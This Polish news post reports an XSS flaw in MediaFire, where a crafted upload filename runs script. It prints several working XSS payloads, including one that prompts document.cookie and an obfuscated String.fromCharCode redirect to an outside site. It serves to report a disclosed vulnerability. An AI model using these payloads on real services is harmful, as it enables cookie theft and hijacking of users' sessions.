Ostatnio pisaliśmy o problemach nowej usługi w chmurze Kima Dotcoma. Jak się okazuje konkurencyjny MediaFire, który jest już długo na rynku, też wcale nie jest do końca bezpieczny. Okazało się, że uploadując plik o odpowiednio spreparowanej nazwie, możemy wykonać dowolny kod.
Możliwość wykonania ataku XSS odkrył badacz Mahadev Subedi z coolpokharacity.com. Atak jest możliwy dzięki temu, że programiści MediaFire nie zastosowali żadnego filtru ładowanych plików.
Najprostszym przykładem jest utworzenie pliku o poniższej nazwie:
1 |
"><img src=x onerror=alert(0)>.jpg.txt |
Podczas próby jego załadowania zostaniemy uraczeni dodatkowym oknem:
Nic nie stoi na przeszkodzie, by zastosować bardziej bogatszą wersję:
1 2 3 4 5 6 7 8 9 |
‘”><img src=x onerror=prompt(0);> ‘>script>alert(xss)</script> >”‘><script>alert(?XSS’)</script> %22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E “>script>alert(xss)</script> <div/onmouseover=’alert(“XSS”/*=*/)’><!–&–>XSS</div><!–= onmouseover=prompt(document.cookie) bad=” <script>document.location=String.fromCharCode(104 116 116 112 58 47 47 119 119 119 46 99 111 111 108 112 111 107 104 97 114 97 99 105 116 121 46 99 111 109 )</script>.txt |
Odkrywca powiadomił właścicieli MediaFire, aczkolwiek usterka nadal istnieje…